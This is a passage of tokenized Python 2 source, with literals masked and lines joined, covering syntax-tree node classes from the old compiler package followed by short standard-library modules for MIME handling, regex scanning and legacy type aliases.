tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . items ) , ) <EOL> class Discard ( Node ) : <EOL> def __init__ ( self , expr , lineno = None ) : <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , ) <EOL> class Div ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class Ellipsis ( Node ) : <EOL> def __init__ ( self , lineno = None ) : <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return ( ) <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> class Exec ( Node ) : <EOL> def __init__ ( self , expr , locals , globals , lineno = None ) : <EOL> self . expr = expr <EOL> self . locals = locals <EOL> self . globals = globals <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr ) <EOL> children . append ( self . locals ) <EOL> children . append ( self . globals ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . expr ) <EOL> if self . locals is not None : <EOL> nodelist . append ( self . locals ) <EOL> if self . globals is not None : <EOL> nodelist . append ( self . globals ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . locals ) , repr ( self . globals ) ) <EOL> class FloorDiv ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class For ( Node ) : <EOL> def __init__ ( self , assign , list , body , else_ , lineno = None ) : <EOL> self . assign = assign <EOL> self . list = list <EOL> self . body = body <EOL> self . else_ = else_ <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . assign ) <EOL> children . append ( self . list ) <EOL> children . append ( self . body ) <EOL> children . append ( self . else_ ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . assign ) <EOL> nodelist . append ( self . list ) <EOL> nodelist . append ( self . body ) <EOL> if self . else_ is not None : <EOL> nodelist . append ( self . else_ ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . assign ) , repr ( self . list ) , repr ( self . body ) , repr ( self . else_ ) ) <EOL> class From ( Node ) : <EOL> def __init__ ( self , modname , names , level , lineno = None ) : <EOL> self . modname = modname <EOL> self . names = names <EOL> self . level = level <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . modname , self . names , self . level <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . modname ) , repr ( self . names ) , repr ( self . level ) ) <EOL> class Function ( Node ) : <EOL> def __init__ ( self , decorators , name , argnames , defaults , flags , doc , code , lineno = None ) : <EOL> self . decorators = decorators <EOL> self . name = name <EOL> self . argnames = argnames <EOL> self . defaults = defaults <EOL> self . flags = flags <EOL> self . doc = doc <EOL> self . code = code <EOL> self . lineno = lineno <EOL> self . varargs = self . kwargs = None <EOL> if flags & CO_VARARGS : <EOL> self . varargs = <NUM_LIT:1> <EOL> if flags & CO_VARKEYWORDS : <EOL> self . kwargs = <NUM_LIT:1> <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . decorators ) <EOL> children . append ( self . name ) <EOL> children . append ( self . argnames ) <EOL> children . extend ( flatten ( self . defaults ) ) <EOL> children . append ( self . flags ) <EOL> children . append ( self . doc ) <EOL> children . append ( self . code ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> if self . decorators is not None : <EOL> nodelist . append ( self . decorators ) <EOL> nodelist . extend ( flatten_nodes ( self . defaults ) ) <EOL> nodelist . append ( self . code ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . decorators ) , repr ( self . name ) , repr ( self . argnames ) , repr ( self . defaults ) , repr ( self . flags ) , repr ( self . doc ) , repr ( self . code ) ) <EOL> class GenExpr ( Node ) : <EOL> def __init__ ( self , code , lineno = None ) : <EOL> self . code = code <EOL> self . lineno = lineno <EOL> self . argnames = [ '<STR_LIT>' ] <EOL> self . varargs = self . kwargs = None <EOL> def getChildren ( self ) : <EOL> return self . code , <EOL> def getChildNodes ( self ) : <EOL> return self . code , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . code ) , ) <EOL> class GenExprFor ( Node ) : <EOL> def __init__ ( self , assign , iter , ifs , lineno = None ) : <EOL> self . assign = assign <EOL> self . iter = iter <EOL> self . ifs = ifs <EOL> self . lineno = lineno <EOL> self . is_outmost = False <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . assign ) <EOL> children . append ( self . iter ) <EOL> children . extend ( flatten ( self . ifs ) ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . assign ) <EOL> nodelist . append ( self . iter ) <EOL> nodelist . extend ( flatten_nodes ( self . ifs ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . assign ) , repr ( self . iter ) , repr ( self . ifs ) ) <EOL> class GenExprIf ( Node ) : <EOL> def __init__ ( self , test , lineno = None ) : <EOL> self . test = test <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . test , <EOL> def getChildNodes ( self ) : <EOL> return self . test , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . test ) , ) <EOL> class GenExprInner ( Node ) : <EOL> def __init__ ( self , expr , quals , lineno = None ) : <EOL> self . expr = expr <EOL> self . quals = quals <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr ) <EOL> children . extend ( flatten ( self . quals ) ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . expr ) <EOL> nodelist . extend ( flatten_nodes ( self . quals ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . quals ) ) <EOL> class Getattr ( Node ) : <EOL> def __init__ ( self , expr , attrname , lineno = None ) : <EOL> self . expr = expr <EOL> self . attrname = attrname <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , self . attrname <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . attrname ) ) <EOL> class Global ( Node ) : <EOL> def __init__ ( self , names , lineno = None ) : <EOL> self . names = names <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . names , <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . names ) , ) <EOL> class If ( Node ) : <EOL> def __init__ ( self , tests , else_ , lineno = None ) : <EOL> self . tests = tests <EOL> self . else_ = else_ <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . extend ( flatten ( self . tests ) ) <EOL> children . append ( self . else_ ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . tests ) ) <EOL> if self . else_ is not None : <EOL> nodelist . append ( self . else_ ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . tests ) , repr ( self . else_ ) ) <EOL> class IfExp ( Node ) : <EOL> def __init__ ( self , test , then , else_ , lineno = None ) : <EOL> self . test = test <EOL> self . then = then <EOL> self . else_ = else_ <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . test , self . then , self . else_ <EOL> def getChildNodes ( self ) : <EOL> return self . test , self . then , self . else_ <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . test ) , repr ( self . then ) , repr ( self . else_ ) ) <EOL> class Import ( Node ) : <EOL> def __init__ ( self , names , lineno = None ) : <EOL> self . names = names <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . names , <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . names ) , ) <EOL> class Invert ( Node ) : <EOL> def __init__ ( self , expr , lineno = None ) : <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , ) <EOL> class Keyword ( Node ) : <EOL> def __init__ ( self , name , expr , lineno = None ) : <EOL> self . name = name <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . name , self . expr <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . name ) , repr ( self . expr ) ) <EOL> class Lambda ( Node ) : <EOL> def __init__ ( self , argnames , defaults , flags , code , lineno = None ) : <EOL> self . argnames = argnames <EOL> self . defaults = defaults <EOL> self . flags = flags <EOL> self . code = code <EOL> self . lineno = lineno <EOL> self . varargs = self . kwargs = None <EOL> if flags & CO_VARARGS : <EOL> self . varargs = <NUM_LIT:1> <EOL> if flags & CO_VARKEYWORDS : <EOL> self . kwargs = <NUM_LIT:1> <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . argnames ) <EOL> children . extend ( flatten ( self . defaults ) ) <EOL> children . append ( self . flags ) <EOL> children . append ( self . code ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . defaults ) ) <EOL> nodelist . append ( self . code ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . argnames ) , repr ( self . defaults ) , repr ( self . flags ) , repr ( self . code ) ) <EOL> class LeftShift ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class List ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class ListComp ( Node ) : <EOL> def __init__ ( self , expr , quals , lineno = None ) : <EOL> self . expr = expr <EOL> self . quals = quals <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr ) <EOL> children . extend ( flatten ( self . quals ) ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . expr ) <EOL> nodelist . extend ( flatten_nodes ( self . quals ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . quals ) ) <EOL> class ListCompFor ( Node ) : <EOL> def __init__ ( self , assign , list , ifs , lineno = None ) : <EOL> self . assign = assign <EOL> self . list = list <EOL> self . ifs = ifs <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . assign ) <EOL> children . append ( self . list ) <EOL> children . extend ( flatten ( self . ifs ) ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . assign ) <EOL> nodelist . append ( self . list ) <EOL> nodelist . extend ( flatten_nodes ( self . ifs ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . assign ) , repr ( self . list ) , repr ( self . ifs ) ) <EOL> class ListCompIf ( Node ) : <EOL> def __init__ ( self , test , lineno = None ) : <EOL> self . test = test <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . test , <EOL> def getChildNodes ( self ) : <EOL> return self . test , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . test ) , ) <EOL> class Mod ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class Module ( Node ) : <EOL> def __init__ ( self , doc , node , lineno = None ) : <EOL> self . doc = doc <EOL> self . node = node <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . doc , self . node <EOL> def getChildNodes ( self ) : <EOL> return self . node , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . doc ) , repr ( self . node ) ) <EOL> class Mul ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class Name ( Node ) : <EOL> def __init__ ( self , name , lineno = None ) : <EOL> self . name = name <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . name , <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . name ) , ) <EOL> class Not ( Node ) : <EOL> def __init__ ( self , expr , lineno = None ) : <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , ) <EOL> class Or ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Pass ( Node ) : <EOL> def __init__ ( self , lineno = None ) : <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return ( ) <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> class Power ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class Print ( Node ) : <EOL> def __init__ ( self , nodes , dest , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . dest = dest <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . extend ( flatten ( self . nodes ) ) <EOL> children . append ( self . dest ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> if self . dest is not None : <EOL> nodelist . append ( self . dest ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , repr ( self . dest ) ) <EOL> class Printnl ( Node ) : <EOL> def __init__ ( self , nodes , dest , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . dest = dest <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . extend ( flatten ( self . nodes ) ) <EOL> children . append ( self . dest ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> if self . dest is not None : <EOL> nodelist . append ( self . dest ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , repr ( self . dest ) ) <EOL> class Raise ( Node ) : <EOL> def __init__ ( self , expr1 , expr2 , expr3 , lineno = None ) : <EOL> self . expr1 = expr1 <EOL> self . expr2 = expr2 <EOL> self . expr3 = expr3 <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr1 ) <EOL> children . append ( self . expr2 ) <EOL> children . append ( self . expr3 ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> if self . expr1 is not None : <EOL> nodelist . append ( self . expr1 ) <EOL> if self . expr2 is not None : <EOL> nodelist . append ( self . expr2 ) <EOL> if self . expr3 is not None : <EOL> nodelist . append ( self . expr3 ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr1 ) , repr ( self . expr2 ) , repr ( self . expr3 ) ) <EOL> class Return ( Node ) : <EOL> def __init__ ( self , value , lineno = None ) : <EOL> self . value = value <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . value , <EOL> def getChildNodes ( self ) : <EOL> return self . value , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . value ) , ) <EOL> class RightShift ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class Slice ( Node ) : <EOL> def __init__ ( self , expr , flags , lower , upper , lineno = None ) : <EOL> self . expr = expr <EOL> self . flags = flags <EOL> self . lower = lower <EOL> self . upper = upper <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr ) <EOL> children . append ( self . flags ) <EOL> children . append ( self . lower ) <EOL> children . append ( self . upper ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . expr ) <EOL> if self . lower is not None : <EOL> nodelist . append ( self . lower ) <EOL> if self . upper is not None : <EOL> nodelist . append ( self . upper ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . flags ) , repr ( self . lower ) , repr ( self . upper ) ) <EOL> class Sliceobj ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Stmt ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Sub ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class Subscript ( Node ) : <EOL> def __init__ ( self , expr , flags , subs , lineno = None ) : <EOL> self . expr = expr <EOL> self . flags = flags <EOL> self . subs = subs <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr ) <EOL> children . append ( self . flags ) <EOL> children . extend ( flatten ( self . subs ) ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . expr ) <EOL> nodelist . extend ( flatten_nodes ( self . subs ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . flags ) , repr ( self . subs ) ) <EOL> class TryExcept ( Node ) : <EOL> def __init__ ( self , body , handlers , else_ , lineno = None ) : <EOL> self . body = body <EOL> self . handlers = handlers <EOL> self . else_ = else_ <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . body ) <EOL> children . extend ( flatten ( self . handlers ) ) <EOL> children . append ( self . else_ ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . body ) <EOL> nodelist . extend ( flatten_nodes ( self . handlers ) ) <EOL> if self . else_ is not None : <EOL> nodelist . append ( self . else_ ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . body ) , repr ( self . handlers ) , repr ( self . else_ ) ) <EOL> class TryFinally ( Node ) : <EOL> def __init__ ( self , body , final , lineno = None ) : <EOL> self . body = body <EOL> self . final = final <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . body , self . final <EOL> def getChildNodes ( self ) : <EOL> return self . body , self . final <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . body ) , repr ( self . final ) ) <EOL> class Tuple ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class UnaryAdd ( Node ) : <EOL> def __init__ ( self , expr , lineno = None ) : <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , ) <EOL> class UnarySub ( Node ) : <EOL> def __init__ ( self , expr , lineno = None ) : <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , ) <EOL> class While ( Node ) : <EOL> def __init__ ( self , test , body , else_ , lineno = None ) : <EOL> self . test = test <EOL> self . body = body <EOL> self . else_ = else_ <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . test ) <EOL> children . append ( self . body ) <EOL> children . append ( self . else_ ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . test ) <EOL> nodelist . append ( self . body ) <EOL> if self . else_ is not None : <EOL> nodelist . append ( self . else_ ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . test ) , repr ( self . body ) , repr ( self . else_ ) ) <EOL> class With ( Node ) : <EOL> def __init__ ( self , expr , vars , body , lineno = None ) : <EOL> self . expr = expr <EOL> self . vars = vars <EOL> self . body = body <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr ) <EOL> children . append ( self . vars ) <EOL> children . append ( self . body ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . expr ) <EOL> if self . vars is not None : <EOL> nodelist . append ( self . vars ) <EOL> nodelist . append ( self . body ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . vars ) , repr ( self . body ) ) <EOL> class Yield ( Node ) : <EOL> def __init__ ( self , value , lineno = None ) : <EOL> self . value = value <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . value , <EOL> def getChildNodes ( self ) : <EOL> return self . value , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . value ) , ) <EOL> for name , obj in globals ( ) . items ( ) : <EOL> if isinstance ( obj , type ) and issubclass ( obj , Node ) : <EOL> nodes [ name . lower ( ) ] = obj </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' ] <EOL> from email import errors <EOL> from email . mime . base import MIMEBase <EOL> class MIMENonMultipart ( MIMEBase ) : <EOL> """<STR_LIT>""" <EOL> __pychecker__ = '<STR_LIT>' <EOL> def attach ( self , payload ) : <EOL> raise errors . MultipartConversionError ( <EOL> '<STR_LIT>' ) <EOL> del __pychecker__ </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import sre_parse <EOL> import sre_compile <EOL> import sre_constants <EOL> from re import VERBOSE , MULTILINE , DOTALL <EOL> from sre_constants import BRANCH , SUBPATTERN <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> FLAGS = ( VERBOSE | MULTILINE | DOTALL ) <EOL> class Scanner ( object ) : <EOL> def __init__ ( self , lexicon , flags = FLAGS ) : <EOL> self . actions = [ None ] <EOL> s = sre_parse . Pattern ( ) <EOL> s . flags = flags <EOL> p = [ ] <EOL> for idx , token in enumerate ( lexicon ) : <EOL> phrase = token . pattern <EOL> try : <EOL> subpattern = sre_parse . SubPattern ( s , <EOL> [ ( SUBPATTERN , ( idx + <NUM_LIT:1> , sre_parse . parse ( phrase , flags ) ) ) ] ) <EOL> except sre_constants . error : <EOL> raise <EOL> p . append ( subpattern ) <EOL> self . actions . append ( token ) <EOL> s . groups = len ( p ) + <NUM_LIT:1> <EOL> p = sre_parse . SubPattern ( s , [ ( BRANCH , ( None , p ) ) ] ) <EOL> self . scanner = sre_compile . compile ( p ) <EOL> def iterscan ( self , string , idx = <NUM_LIT:0> , context = None ) : <EOL> """<STR_LIT>""" <EOL> match = self . scanner . scanner ( string , idx ) . match <EOL> actions = self . actions <EOL> lastend = idx <EOL> end = len ( string ) <EOL> while True : <EOL> m = match ( ) <EOL> if m is None : <EOL> break <EOL> matchbegin , matchend = m . span ( ) <EOL> if lastend == matchend : <EOL> break <EOL> action = actions [ m . lastindex ] <EOL> if action is not None : <EOL> rval , next_pos = action ( m , context ) <EOL> if next_pos is not None and next_pos != matchend : <EOL> matchend = next_pos <EOL> match = self . scanner . scanner ( string , matchend ) . match <EOL> yield rval , matchend <EOL> lastend = matchend <EOL> def pattern ( pattern , flags = FLAGS ) : <EOL> def decorator ( fn ) : <EOL> fn . pattern = pattern <EOL> fn . regex = re . compile ( pattern , flags ) <EOL> return fn <EOL> return decorator </s>
<s> """<STR_LIT>""" <EOL> from warnings import warnpy3k <EOL> warnpy3k ( "<STR_LIT>" <EOL> "<STR_LIT>" , stacklevel = <NUM_LIT:2> ) <EOL> del warnpy3k <EOL> from types import ClassType as classobj <EOL> from types import FunctionType as function <EOL> from types import InstanceType as instance <EOL> from types import MethodType as instancemethod <EOL> from types import ModuleType as module <EOL> try : <EOL> from types import CodeType as code <EOL> except ImportError : <EOL> pass </s>
